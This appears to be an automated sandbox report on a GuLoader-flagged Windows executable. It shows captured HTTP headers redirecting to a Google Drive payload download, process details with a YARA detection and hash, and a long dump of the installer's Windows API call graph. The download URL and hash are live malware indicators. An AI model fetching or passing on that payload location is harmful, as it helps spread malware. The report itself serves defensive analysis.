                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:43 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:43 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-eWaK4ypKrgNCRHcYGXu3DQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Target ID:0
                                                    Start time:09:38:39
                                                    Start date:10/01/2025
                                                    Path:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\fTSt7dc60O.exe"
                                                    Imagebase:0x400000
                                                    File size:540'745 bytes
                                                    MD5 hash:0EECC852B848039DA55141FB43DD01E2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1367001967.00000000055DB000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:8
                                                    Start time:09:38:51
                                                    Start date:10/01/2025
                                                    Path:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\fTSt7dc60O.exe"
                                                    Imagebase:0x400000
                                                    File size:540'745 bytes
                                                    MD5 hash:0EECC852B848039DA55141FB43DD01E2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.2484621112.000000000219B000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:false

                                                      Execution Graph

                                                      Execution Coverage:20.1%
                                                      Dynamic/Decrypted Code Coverage:13.8%
                                                      Signature Coverage:18.6%
                                                      Total number of Nodes:1528
                                                      Total number of Limit Nodes:41
4108 404295 CreateBrushIndirect 4107->4108 4109 40428e DeleteObject 4107->4109 4108->4098 4109->4108 4964 401a42 4965 402b1d 18 API calls 4964->4965 4966 401a48 4965->4966 4967 402b1d 18 API calls 4966->4967 4968 4019f0 4967->4968 4969 402746 4970 402741 4969->4970 4970->4969 4971 402756 FindNextFileW 4970->4971 4972 4027a8 4971->4972 4973 402761 4971->4973 4975 405f48 lstrcpynW 4972->4975 4975->4973 4976 401cc6 4977 402b1d 18 API calls 4976->4977 4978 401cd9 SetWindowLongW 4977->4978 4979 4029c7 4978->4979 4253 401dc7 4261 402b1d 4253->4261 4255 401dcd 4256 402b1d 18 API calls 4255->4256 4257 401dd6 4256->4257 4258 401de8 EnableWindow 4257->4258 4259 401ddd ShowWindow 4257->4259 4260 4029c7 4258->4260 4259->4260 4262 405f6a 18 API calls 4261->4262 4263 402b31 4262->4263 4263->4255 4980 401bca 4981 402b1d 18 API calls 4980->4981 4982 401bd1 4981->4982 4983 402b1d 18 API calls 4982->4983 4984 401bdb 4983->4984 4985 401beb 4984->4985 4986 402b3a 18 API calls 4984->4986 4987 401bfb 4985->4987 4988 402b3a 18 API calls 4985->4988 4986->4985 4989 401c06 4987->4989 4990 401c4a 4987->4990 4988->4987 4992 402b1d 18 API calls 4989->4992 4991 402b3a 18 API calls 4990->4991 4994 401c4f 4991->4994 4993 401c0b 4992->4993 4995 402b1d 18 API calls 4993->4995 4996 402b3a 18 API calls 4994->4996 4997 401c14 4995->4997 4998 401c58 FindWindowExW 4996->4998 4999 401c3a SendMessageW 4997->4999 5000 401c1c SendMessageTimeoutW 4997->5000 5001 401c7a 4998->5001 4999->5001 5000->5001 4286 4014cb 4287 4051f2 25 API calls 4286->4287 4288 4014d2 4287->4288 5002 40194b 5003 402b1d 18 API calls 5002->5003 5004 401952 5003->5004 5005 402b1d 18 API calls 5004->5005 5006 40195c 5005->5006 5007 402b3a 18 API calls 5006->5007 5008 401965 5007->5008 5009 401979 lstrlenW 5008->5009 5014 4019b5 5008->5014 5010 401983 5009->5010 5010->5014 5015 405f48 lstrcpynW 5010->5015 5012 40199e 5013 4019ab lstrlenW 5012->5013 5012->5014 5013->5014 5015->5012 5016 4024cc 5017 402b3a 18 API calls 5016->5017 5018 
4024d3 5017->5018 5021 405bb4 GetFileAttributesW CreateFileW 5018->5021 5020 4024df 5021->5020 5022 40164d 5023 402b3a 18 API calls 5022->5023 5024 401653 5023->5024 5025 40628b 2 API calls 5024->5025 5026 401659 5025->5026 5027 4019cf 5028 402b3a 18 API calls 5027->5028 5029 4019d6 5028->5029 5030 402b3a 18 API calls 5029->5030 5031 4019df 5030->5031 5032 4019e6 lstrcmpiW 5031->5032 5033 4019f8 lstrcmpW 5031->5033 5034 4019ec 5032->5034 5033->5034 5035 401e51 5036 402b3a 18 API calls 5035->5036 5037 401e57 5036->5037 5038 4051f2 25 API calls 5037->5038 5039 401e61 5038->5039 5040 4056c3 2 API calls 5039->5040 5041 401e67 5040->5041 5042 401ec6 CloseHandle 5041->5042 5043 401e77 WaitForSingleObject 5041->5043 5045 402793 5041->5045 5042->5045 5044 401e89 5043->5044 5046 401e9b GetExitCodeProcess 5044->5046 5047 4062eb 2 API calls 5044->5047 5048 401eb8 5046->5048 5049 401ead 5046->5049 5050 401e90 WaitForSingleObject 5047->5050 5048->5042 5052 405e8f wsprintfW 5049->5052 5050->5044 5052->5048 4345 401752 4346 402b3a 18 API calls 4345->4346 4347 401759 4346->4347 4348 401781 4347->4348 4349 401779 4347->4349 4401 405f48 lstrcpynW 4348->4401 4400 405f48 lstrcpynW 4349->4400 4352 40177f 4356 4061dc 5 API calls 4352->4356 4353 40178c 4354 405993 3 API calls 4353->4354 4355 401792 lstrcatW 4354->4355 4355->4352 4361 40179e 4356->4361 4357 40628b 2 API calls 4357->4361 4358 4017da 4359 405b8f 2 API calls 4358->4359 4359->4361 4361->4357 4361->4358 4362 4017b0 CompareFileTime 4361->4362 4363 401870 4361->4363 4366 405f48 lstrcpynW 4361->4366 4371 405f6a 18 API calls 4361->4371 4381 401847 4361->4381 4384 405bb4 GetFileAttributesW CreateFileW 4361->4384 4402 405724 4361->4402 4362->4361 4364 4051f2 25 API calls 4363->4364 4367 40187a 4364->4367 4365 4051f2 25 API calls 4383 40185c 4365->4383 4366->4361 4385 403062 4367->4385 4369 4018a1 SetFileTime 4372 4018b3 CloseHandle 4369->4372 4371->4361 4373 4018c4 4372->4373 4372->4383 4374 4018c9 4373->4374 4375 4018dc 4373->4375 
4376 405f6a 18 API calls 4374->4376 4377 405f6a 18 API calls 4375->4377 4378 4018d1 lstrcatW 4376->4378 4379 4018e4 4377->4379 4378->4379 4382 405724 MessageBoxIndirectW 4379->4382 4381->4365 4381->4383 4382->4383 4384->4361 4386 403072 SetFilePointer 4385->4386 4387 40308e 4385->4387 4386->4387 4406 40317d GetTickCount 4387->4406 4390 405c37 ReadFile 4391 4030ae 4390->4391 4392 40317d 43 API calls 4391->4392 4399 40188d 4391->4399 4393 4030c5 4392->4393 4394 4030d5 4393->4394 4395 40313f ReadFile 4393->4395 4393->4399 4397 405c37 ReadFile 4394->4397 4398 403108 WriteFile 4394->4398 4394->4399 4395->4399 4397->4394 4398->4394 4398->4399 4399->4369 4399->4372 4400->4352 4401->4353 4403 405739 4402->4403 4404 405785 4403->4404 4405 40574d MessageBoxIndirectW 4403->4405 4404->4361 4405->4404 4407 4032e7 4406->4407 4408 4031ac 4406->4408 4409 402d1a 33 API calls 4407->4409 4419 40330f SetFilePointer 4408->4419 4415 403095 4409->4415 4411 4031b7 SetFilePointer 4417 4031dc 4411->4417 4415->4390 4415->4399 4416 403271 WriteFile 4416->4415 4416->4417 4417->4415 4417->4416 4418 4032c8 SetFilePointer 4417->4418 4420 4032f9 4417->4420 4423 4063ee 4417->4423 4430 402d1a 4417->4430 4418->4407 4419->4411 4421 405c37 ReadFile 4420->4421 4422 40330c 4421->4422 4422->4417 4424 406413 4423->4424 4427 40641b 4423->4427 4424->4417 4425 4064a2 GlobalFree 4426 4064ab GlobalAlloc 4425->4426 4426->4424 4426->4427 4427->4424 4427->4425 4427->4426 4428 406522 GlobalAlloc 4427->4428 4429 406519 GlobalFree 4427->4429 4428->4424 4428->4427 4429->4428 4431 402d43 4430->4431 4432 402d2b 4430->4432 4434 402d53 GetTickCount 4431->4434 4435 402d4b 4431->4435 4433 402d34 DestroyWindow 4432->4433 4438 402d3b 4432->4438 4433->4438 4437 402d61 4434->4437 4434->4438 4445 4062eb 4435->4445 4439 402d96 CreateDialogParamW ShowWindow 4437->4439 4440 402d69 4437->4440 4438->4417 4439->4438 4440->4438 4449 402cfe 4440->4449 4442 402d77 wsprintfW 4443 4051f2 25 API calls 4442->4443 4444 402d94 4443->4444 
4444->4438 4446 406308 PeekMessageW 4445->4446 4447 406318 4446->4447 4448 4062fe DispatchMessageW 4446->4448 4447->4438 4448->4446 4450 402d0d 4449->4450 4451 402d0f MulDiv 4449->4451 4450->4451 4451->4442 4452 402253 4453 402261 4452->4453 4454 40225b 4452->4454 4456 402b3a 18 API calls 4453->4456 4459 40226f 4453->4459 4455 402b3a 18 API calls 4454->4455 4455->4453 4456->4459 4457 40227d 4458 402b3a 18 API calls 4457->4458 4461 402286 WritePrivateProfileStringW 4458->4461 4459->4457 4460 402b3a 18 API calls 4459->4460 4460->4457 5067 402454 5068 402c44 19 API calls 5067->5068 5069 40245e 5068->5069 5070 402b1d 18 API calls 5069->5070 5071 402467 5070->5071 5072 40248b RegEnumValueW 5071->5072 5073 40247f RegEnumKeyW 5071->5073 5074 402793 5071->5074 5072->5074 5075 4024a4 RegCloseKey 5072->5075 5073->5075 5075->5074 5077 401ed4 5078 402b3a 18 API calls 5077->5078 5079 401edb 5078->5079 5080 40628b 2 API calls 5079->5080 5081 401ee1 5080->5081 5082 401ef2 5081->5082 5084 405e8f wsprintfW 5081->5084 5084->5082 4475 4022d5 4476 402305 4475->4476 4477 4022da 4475->4477 4479 402b3a 18 API calls 4476->4479 4478 402c44 19 API calls 4477->4478 4480 4022e1 4478->4480 4481 40230c 4479->4481 4482 4022eb 4480->4482 4486 402322 4480->4486 4487 402b7a RegOpenKeyExW 4481->4487 4483 402b3a 18 API calls 4482->4483 4485 4022f2 RegDeleteValueW RegCloseKey 4483->4485 4485->4486 4488 402c0e 4487->4488 4492 402ba5 4487->4492 4488->4486 4489 402bcb RegEnumKeyW 4490 402bdd RegCloseKey 4489->4490 4489->4492 4493 4062b2 3 API calls 4490->4493 4491 402c02 RegCloseKey 4495 402bf1 4491->4495 4492->4489 4492->4490 4492->4491 4494 402b7a 3 API calls 4492->4494 4496 402bed 4493->4496 4494->4492 4495->4488 4496->4495 4497 402c1d RegDeleteKeyW 4496->4497 4497->4495 4505 4014d7 4506 402b1d 18 API calls 4505->4506 4507 4014dd Sleep 4506->4507 4509 4029c7 4507->4509 4721 40335a #17 SetErrorMode OleInitialize 4722 4062b2 3 API calls 4721->4722 4723 40339d SHGetFileInfoW 4722->4723 4796 405f48 
lstrcpynW 4723->4796 4725 4033c8 GetCommandLineW 4797 405f48 lstrcpynW 4725->4797 4727 4033da GetModuleHandleW 4728 4033f4 4727->4728 4729 4059c0 CharNextW 4728->4729 4730 403402 CharNextW 4729->4730 4738 403414 4730->4738 4731 403516 4732 40352a GetTempPathW 4731->4732 4798 403326 4732->4798 4734 403542 4735 403546 GetWindowsDirectoryW lstrcatW 4734->4735 4736 40359c DeleteFileW 4734->4736 4739 403326 11 API calls 4735->4739 4806 402dbc GetTickCount GetModuleFileNameW 4736->4806 4737 4059c0 CharNextW 4737->4738 4738->4731 4738->4737 4744 403518 4738->4744 4741 403562 4739->4741 4741->4736 4743 403566 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4741->4743 4742 4035b0 4750 4059c0 CharNextW 4742->4750 4779 403653 4742->4779 4791 403663 4742->4791 4746 403326 11 API calls 4743->4746 4890 405f48 lstrcpynW 4744->4890 4749 403594 4746->4749 4749->4736 4749->4791 4762 4035cf 4750->4762 4752 403772 4755 403815 ExitProcess 4752->4755 4760 4062b2 3 API calls 4752->4760 4753 40367c 4754 405724 MessageBoxIndirectW 4753->4754 4756 40368a ExitProcess 4754->4756 4757 403692 lstrcatW lstrcmpiW 4764 4036ae CreateDirectoryW SetCurrentDirectoryW 4757->4764 4757->4791 4758 40362d 4763 405a9b 18 API calls 4758->4763 4761 403785 4760->4761 4765 4062b2 3 API calls 4761->4765 4762->4757 4762->4758 4766 403639 4763->4766 4767 4036d1 4764->4767 4768 4036c6 4764->4768 4769 40378e 4765->4769 4766->4791 4891 405f48 lstrcpynW 4766->4891 4903 405f48 lstrcpynW 4767->4903 4902 405f48 lstrcpynW 4768->4902 4772 4062b2 3 API calls 4769->4772 4774 403797 4772->4774 4776 4037b5 4774->4776 4784 4037a5 GetCurrentProcess 4774->4784 4775 403648 4892 405f48 lstrcpynW 4775->4892 4780 4062b2 3 API calls 4776->4780 4778 405f6a 18 API calls 4781 403710 DeleteFileW 4778->4781 4836 40391f 4779->4836 4782 4037ec 4780->4782 4783 40371d CopyFileW 4781->4783 4793 4036df 4781->4793 4785 403801 ExitWindowsEx 4782->4785 4788 40380e 4782->4788 4783->4793 4784->4776 4785->4755 4785->4788 4786 
403766 4789 405de2 40 API calls 4786->4789 4787 405de2 40 API calls 4787->4793 4790 40140b 2 API calls 4788->4790 4789->4791 4790->4755 4893 40382d 4791->4893 4792 405f6a 18 API calls 4792->4793 4793->4778 4793->4786 4793->4787 4793->4792 4795 403751 CloseHandle 4793->4795 4904 4056c3 CreateProcessW 4793->4904 4795->4793 4796->4725 4797->4727 4799 4061dc 5 API calls 4798->4799 4800 403332 4799->4800 4801 40333c 4800->4801 4802 405993 3 API calls 4800->4802 4801->4734 4803 403344 CreateDirectoryW 4802->4803 4907 405be3 4803->4907 4911 405bb4 GetFileAttributesW CreateFileW 4806->4911 4808 402dff 4835 402e0c 4808->4835 4912 405f48 lstrcpynW 4808->4912 4810 402e22 4811 4059df 2 API calls 4810->4811 4812 402e28 4811->4812 4913 405f48 lstrcpynW 4812->4913 4814 402e33 GetFileSize 4815 402f34 4814->4815 4833 402e4a 4814->4833 4816 402d1a 33 API calls 4815->4816 4817 402f3b 4816->4817 4819 402f77 GlobalAlloc 4817->4819 4817->4835 4915 40330f SetFilePointer 4817->4915 4818 4032f9 ReadFile 4818->4833 4821 402f8e 4819->4821 4820 402fcf 4822 402d1a 33 API calls 4820->4822 4825 405be3 2 API calls 4821->4825 4822->4835 4824 402f58 4826 4032f9 ReadFile 4824->4826 4828 402f9f CreateFileW 4825->4828 4829 402f63 4826->4829 4827 402d1a 33 API calls 4827->4833 4830 402fd9 4828->4830 4828->4835 4829->4819 4829->4835 4914 40330f SetFilePointer 4830->4914 4832 402fe7 4834 403062 46 API calls 4832->4834 4833->4815 4833->4818 4833->4820 4833->4827 4833->4835 4834->4835 4835->4742 4837 4062b2 3 API calls 4836->4837 4838 403933 4837->4838 4839 403939 4838->4839 4840 40394b 4838->4840 4925 405e8f wsprintfW 4839->4925 4841 405e15 3 API calls 4840->4841 4842 40397b 4841->4842 4844 40399a lstrcatW 4842->4844 4846 405e15 3 API calls 4842->4846 4845 403949 4844->4845 4916 403bf5 4845->4916 4846->4844 4849 405a9b 18 API calls 4850 4039cc 4849->4850 4851 403a60 4850->4851 4853 405e15 3 API calls 4850->4853 4852 405a9b 18 API calls 4851->4852 4854 403a66 4852->4854 4855 4039fe 4853->4855 4856 403a76 
LoadImageW 4854->4856 4857 405f6a 18 API calls 4854->4857 4855->4851 4860 403a1f lstrlenW 4855->4860 4864 4059c0 CharNextW 4855->4864 4858 403b1c 4856->4858 4859 403a9d RegisterClassW 4856->4859 4857->4856 4863 40140b 2 API calls 4858->4863 4861 403ad3 SystemParametersInfoW CreateWindowExW 4859->4861 4862 403b26 4859->4862 4865 403a53 4860->4865 4866 403a2d lstrcmpiW 4860->4866 4861->4858 4862->4791 4867 403b22 4863->4867 4868 403a1c 4864->4868 4870 405993 3 API calls 4865->4870 4866->4865 4869 403a3d GetFileAttributesW 4866->4869 4867->4862 4872 403bf5 19 API calls 4867->4872 4868->4860 4871 403a49 4869->4871 4873 403a59 4870->4873 4871->4865 4874 4059df 2 API calls 4871->4874 4875 403b33 4872->4875 4926 405f48 lstrcpynW 4873->4926 4874->4865 4877 403bc2 4875->4877 4878 403b3f ShowWindow LoadLibraryW 4875->4878 4881 4052c5 5 API calls 4877->4881 4879 403b65 GetClassInfoW 4878->4879 4880 403b5e LoadLibraryW 4878->4880 4882 403b79 GetClassInfoW RegisterClassW 4879->4882 4883 403b8f DialogBoxParamW 4879->4883 4880->4879 4884 403bc8 4881->4884 4882->4883 4885 40140b 2 API calls 4883->4885 4886 403be4 4884->4886 4887 403bcc 4884->4887 4885->4862 4888 40140b 2 API calls 4886->4888 4887->4862 4889 40140b 2 API calls 4887->4889 4888->4862 4889->4862 4890->4732 4891->4775 4892->4779 4894 403848 4893->4894 4895 40383e CloseHandle 4893->4895 4896 403852 CloseHandle 4894->4896 4897 40385c 4894->4897 4895->4894 4896->4897 4928 40388a 4897->4928 4900 4057d0 71 API calls 4901 40366c OleUninitialize 4900->4901 4901->4752 4901->4753 4902->4767 4903->4793 4905 4056f2 CloseHandle 4904->4905 4906 4056fe 4904->4906 4905->4906 4906->4793 4908 405bf0 GetTickCount GetTempFileNameW 4907->4908 4909 405c26 4908->4909 4910 403358 4908->4910 4909->4908 4909->4910 4910->4734 4911->4808 4912->4810 4913->4814 4914->4832 4915->4824 4917 403c09 4916->4917 4927 405e8f wsprintfW 4917->4927 4919 403c7a 4920 405f6a 18 API calls 4919->4920 4921 403c86 SetWindowTextW 4920->4921 4922 403ca2 4921->4922 
4923 4039aa 4921->4923 4922->4923 4924 405f6a 18 API calls 4922->4924 4923->4849 4924->4922 4925->4845 4926->4851 4927->4919 4929 403898 4928->4929 4930 40389d FreeLibrary GlobalFree 4929->4930 4931 403861 4929->4931 4930->4930 4930->4931 4931->4900 5092 40155b 5093 40296d 5092->5093 5096 405e8f wsprintfW 5093->5096 5095 402972 5096->5095 5097 4038dd 5098 4038e8 5097->5098 5099 4038ec 5098->5099 5100 4038ef GlobalAlloc 5098->5100 5100->5099 5101 40165e 5102 402b3a 18 API calls 5101->5102 5103 401665 5102->5103 5104 402b3a 18 API calls 5103->5104 5105 40166e 5104->5105 5106 402b3a 18 API calls 5105->5106 5107 401677 MoveFileW 5106->5107 5108 401683 5107->5108 5109 40168a 5107->5109 5111 401423 25 API calls 5108->5111 5110 40628b 2 API calls 5109->5110 5113 402197 5109->5113 5112 401699 5110->5112 5111->5113 5112->5113 5114 405de2 40 API calls 5112->5114 5114->5108 3946 4023e0 3957 402c44 3946->3957 3948 4023ea 3961 402b3a 3948->3961 3951 4023fe RegQueryValueExW 3952 40241e 3951->3952 3956 402424 RegCloseKey 3951->3956 3952->3956 3967 405e8f wsprintfW 3952->3967 3953 402793 3956->3953 3958 402b3a 18 API calls 3957->3958 3959 402c5d 3958->3959 3960 402c6b RegOpenKeyExW 3959->3960 3960->3948 3962 402b46 3961->3962 3968 405f6a 3962->3968 3965 4023f3 3965->3951 3965->3953 3967->3956 3984 405f77 3968->3984 3969 4061c2 3970 402b67 3969->3970 4002 405f48 lstrcpynW 3969->4002 3970->3965 3986 4061dc 3970->3986 3972 40602a GetVersion 3972->3984 3973 406190 lstrlenW 3973->3984 3974 405f6a 10 API calls 3974->3973 3978 4060a5 GetSystemDirectoryW 3978->3984 3979 4060b8 GetWindowsDirectoryW 3979->3984 3980 4061dc 5 API calls 3980->3984 3981 405f6a 10 API calls 3981->3984 3982 406131 lstrcatW 3982->3984 3983 4060ec SHGetSpecialFolderLocation 3983->3984 3985 406104 SHGetPathFromIDListW CoTaskMemFree 3983->3985 3984->3969 3984->3972 3984->3973 3984->3974 3984->3978 3984->3979 3984->3980 3984->3981 3984->3982 3984->3983 3995 405e15 RegOpenKeyExW 3984->3995 4000 405e8f wsprintfW 
3984->4000 4001 405f48 lstrcpynW 3984->4001 3985->3984 3987 4061e9 3986->3987 3989 406252 CharNextW 3987->3989 3990 40625f 3987->3990 3993 40623e CharNextW 3987->3993 3994 40624d CharNextW 3987->3994 4003 4059c0 3987->4003 3988 406264 CharPrevW 3988->3990 3989->3987 3989->3990 3990->3988 3991 406285 3990->3991 3991->3965 3993->3987 3994->3989 3996 405e89 3995->3996 3997 405e49 RegQueryValueExW 3995->3997 3996->3984 3998 405e6a RegCloseKey 3997->3998 3998->3996 4000->3984 4001->3984 4002->3970 4004 4059c6 4003->4004 4005 4059dc 4004->4005 4006 4059cd CharNextW 4004->4006 4005->3987 4006->4004 5115 401ce5 GetDlgItem GetClientRect 5116 402b3a 18 API calls 5115->5116 5117 401d17 LoadImageW SendMessageW 5116->5117 5118 401d35 DeleteObject 5117->5118 5119 4029c7 5117->5119 5118->5119 5120 405166 5121 405176 5120->5121 5122 40518a 5120->5122 5124 4051d3 5121->5124 5125 40517c 5121->5125 5123 405192 IsWindowVisible 5122->5123 5131 4051a9 5122->5131 5123->5124 5126 40519f 5123->5126 5127 4051d8 CallWindowProcW 5124->5127 5128 4041e6 SendMessageW 5125->5128 5133 404abc SendMessageW 5126->5133 5130 405186 5127->5130 5128->5130 5131->5127 5138 404b3c 5131->5138 5134 404b1b SendMessageW 5133->5134 5135 404adf GetMessagePos ScreenToClient SendMessageW 5133->5135 5136 404b13 5134->5136 5135->5136 5137 404b18 5135->5137 5136->5131 5137->5134 5147 405f48 lstrcpynW 5138->5147 5140 404b4f 5148 405e8f wsprintfW 5140->5148 5142 404b59 5143 40140b 2 API calls 5142->5143 5144 404b62 5143->5144 5149 405f48 lstrcpynW 5144->5149 5146 404b69 5146->5124 5147->5140 5148->5142 5149->5146 5150 4042e8 lstrlenW 5151 404307 5150->5151 5152 404309 WideCharToMultiByte 5150->5152 5151->5152 5160 100018a9 5161 100018cc 5160->5161 5162 100018ff GlobalFree 5161->5162 5163 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5161->5163 5162->5163 5164 10001272 2 API calls 5163->5164 5165 10001a87 GlobalFree GlobalFree 5164->5165 4267 40206a 4268 402b3a 18 API calls 4267->4268 4269 402071 
4268->4269 4270 402b3a 18 API calls 4269->4270 4271 40207b 4270->4271 4272 402b3a 18 API calls 4271->4272 4273 402084 4272->4273 4274 402b3a 18 API calls 4273->4274 4275 40208e 4274->4275 4276 402b3a 18 API calls 4275->4276 4277 402098 4276->4277 4278 4020ac CoCreateInstance 4277->4278 4279 402b3a 18 API calls 4277->4279 4282 4020cb 4278->4282 4279->4278 4281 402197 4282->4281 4283 401423 4282->4283 4284 4051f2 25 API calls 4283->4284 4285 401431 4284->4285 4285->4281 5166 40156b 5167 401584 5166->5167 5168 40157b ShowWindow 5166->5168 5169 401592 ShowWindow 5167->5169 5170 4029c7 5167->5170 5168->5167 5169->5170 5171 404b6e GetDlgItem GetDlgItem 5172 404bc0 7 API calls 5171->5172 5181 404dd9 5171->5181 5173 404c63 DeleteObject 5172->5173 5174 404c56 SendMessageW 5172->5174 5175 404c6c 5173->5175 5174->5173 5176 404ca3 5175->5176 5180 405f6a 18 API calls 5175->5180 5178 40419a 19 API calls 5176->5178 5177 404ebd 5179 404f69 5177->5179 5190 404f16 SendMessageW 5177->5190 5211 404dcc 5177->5211 5182 404cb7 5178->5182 5184 404f73 SendMessageW 5179->5184 5185 404f7b 5179->5185 5186 404c85 SendMessageW SendMessageW 5180->5186 5181->5177 5183 404e4a 5181->5183 5188 404abc 5 API calls 5181->5188 5189 40419a 19 API calls 5182->5189 5183->5177 5192 404eaf SendMessageW 5183->5192 5184->5185 5187 404fa4 5185->5187 5193 404f94 5185->5193 5194 404f8d ImageList_Destroy 5185->5194 5186->5175 5196 405113 5187->5196 5214 404b3c 4 API calls 5187->5214 5218 404fdf 5187->5218 5188->5183 5195 404cc5 5189->5195 5197 404f2b SendMessageW 5190->5197 5190->5211 5191 404201 8 API calls 5198 40515f 5191->5198 5192->5177 5193->5187 5199 404f9d GlobalFree 5193->5199 5194->5193 5200 404d9a GetWindowLongW SetWindowLongW 5195->5200 5208 404d15 SendMessageW 5195->5208 5210 404d94 5195->5210 5212 404d51 SendMessageW 5195->5212 5213 404d62 SendMessageW 5195->5213 5201 405125 ShowWindow GetDlgItem ShowWindow 5196->5201 5196->5211 5205 404f3e 5197->5205 5199->5187 5202 404db3 5200->5202 5201->5211 5203 
404dd1 5202->5203 5204 404db9 ShowWindow 5202->5204 5223 4041cf SendMessageW 5203->5223 5222 4041cf SendMessageW 5204->5222 5209 404f4f SendMessageW 5205->5209 5208->5195 5209->5179 5210->5200 5210->5202 5211->5191 5212->5195 5213->5195 5214->5218 5215 4050e9 InvalidateRect 5215->5196 5216 4050ff 5215->5216 5224 4049d6 5216->5224 5217 40500d SendMessageW 5221 405023 5217->5221 5218->5217 5218->5221 5220 405097 SendMessageW SendMessageW 5220->5221 5221->5215 5221->5220 5222->5211 5223->5181 5225 4049f3 5224->5225 5226 405f6a 18 API calls 5225->5226 5227 404a28 5226->5227 5228 405f6a 18 API calls 5227->5228 5229 404a33 5228->5229 5230 405f6a 18 API calls 5229->5230 5231 404a64 lstrlenW wsprintfW SetDlgItemTextW 5230->5231 5231->5196 5232 4024ee 5233 4024f3 5232->5233 5234 40250c 5232->5234 5235 402b1d 18 API calls 5233->5235 5236 402512 5234->5236 5237 40253e 5234->5237 5242 4024fa 5235->5242 5238 402b3a 18 API calls 5236->5238 5239 402b3a 18 API calls 5237->5239 5240 402519 WideCharToMultiByte lstrlenA 5238->5240 5241 402545 lstrlenW 5239->5241 5240->5242 5241->5242 5243 402793 5242->5243 5244 402567 WriteFile 5242->5244 5244->5243 5245 4045ee 5246 404624 5245->5246 5247 4045fe 5245->5247 5249 404201 8 API calls 5246->5249 5248 40419a 19 API calls 5247->5248 5250 40460b SetDlgItemTextW 5248->5250 5251 404630 5249->5251 5250->5246 5252 4018ef 5253 401926 5252->5253 5254 402b3a 18 API calls 5253->5254 5255 40192b 5254->5255 5256 4057d0 71 API calls 5255->5256 5257 401934 5256->5257 5258 404970 5259 404980 5258->5259 5260 40499c 5258->5260 5269 405708 GetDlgItemTextW 5259->5269 5262 4049a2 SHGetPathFromIDListW 5260->5262 5263 4049cf 5260->5263 5265 4049b9 SendMessageW 5262->5265 5266 4049b2 5262->5266 5264 40498d SendMessageW 5264->5260 5265->5263 5267 40140b 2 API calls 5266->5267 5267->5265 5269->5264 5270 402770 5271 402b3a 18 API calls 5270->5271 5272 402777 FindFirstFileW 5271->5272 5273 40279f 5272->5273 5277 40278a 5272->5277 5274 4027a8 5273->5274 5278 405e8f 
